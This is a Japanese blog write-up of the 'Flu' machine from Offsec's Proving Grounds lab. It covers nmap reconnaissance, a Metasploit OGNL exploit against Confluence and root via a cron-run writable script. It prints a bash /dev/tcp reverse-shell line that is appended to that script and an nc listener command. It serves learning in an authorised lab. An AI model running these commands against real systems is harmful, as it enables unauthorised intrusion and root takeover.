0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

Pray Grounds 『Flu』Write UP

0
Last updated at Posted at 2026-06-12

はじめに

本記事は学習目的として作成されています。
書かれている全ての攻撃は認められた環境で行っており
外部に向けた許可を得ない攻撃は法律により罰せられます。
この記事の方法を外部に対して行ったことによる結果について当方は如何なる責任も負いません。

こんにちは
今回はOffsec社のProving Groundsにて公開されているマシン
Fluを攻略していきます.
OGNLインジェクションに対して脆弱なマシンです

環境は以下

AttackerIP=192.168.45.231
TargetIP=192.168.136.41

偵察

─$ nmap -sV -sC -O -T4 -n -Pn 192.168.136.41

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
8090/tcp open  http    Apache Tomcat (language: en)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Log In - Confluence
|_Requested resource was /login.action?os_destination=%2Findex.action&permissionViolation=true
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.47 seconds

Nmap の結果、 ポート 8090で Atlassian Confluence が動作していることが判明しました。

OGNLインジェクションに対して脆弱との事前情報があるので
MSFで調べてみます
image.png

エクスプロイトがみつかったので今回はこれを使っていきます。

初期アクセス

image.png

エクスプロイトを行った結果初期シェルが獲得できました。

image.png

whoami

Pwd
で現在地を把握します
その時にlog-Backup.shという自身の権限で書き込みが可能かつ他者も実行可能な興味深いファイルが見つかりました
もしRootによって自動的に実行されていれば一気に権限昇格ができます。
(実行したときは一般的に実行者の権限となるため)

権限昇格

image.png

仮説が本当に正しいか証明するためにCrontabを確認しましたが目当てのタスクは見つかりませんでした。
正直、お手上げです。

と、その時天の声が聞こえました
『汝、pspyを使いなさい』と
我、天啓を得たり!
てことで早速インストールしました
image.png

ビンゴ!!!ということはさっきのlog-Backup.shの内容を変えることで
Root権限で実行されて権限昇格ができるはずです

echo "bash -i >& /dev/tcp/192.168.45.231/4444 0>&1" >> /opt/log-backup.sh

これでシェルを追加するように追記して

nc -lvnp 4444

あとは待機するだけなので飲み物でも飲んでおきます。

image.png

Root権限が取得できました

まとめ

今回のものは定期実行されるタスクがおそらく/rootの個人ディレクトリ等にあったため、表示がされなかったものだと思います。
それでも、プロセス監視ツールでモニタリングすればわかってしまうので、使われるファイルの権限管理だったり

そもそも初期侵入されないためにアップデートをしっかりしておくなど基本的な対策がとても大事だなと思いました。

侵入までは5分だったけど
image.png
50分かかってしまい1時間でした。
もっと柔軟な発想力を身に着けたいですね

さて!!エンジニア積極採用中のGiGOOOのHPは
:bangbang:こちら:bangbang:

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?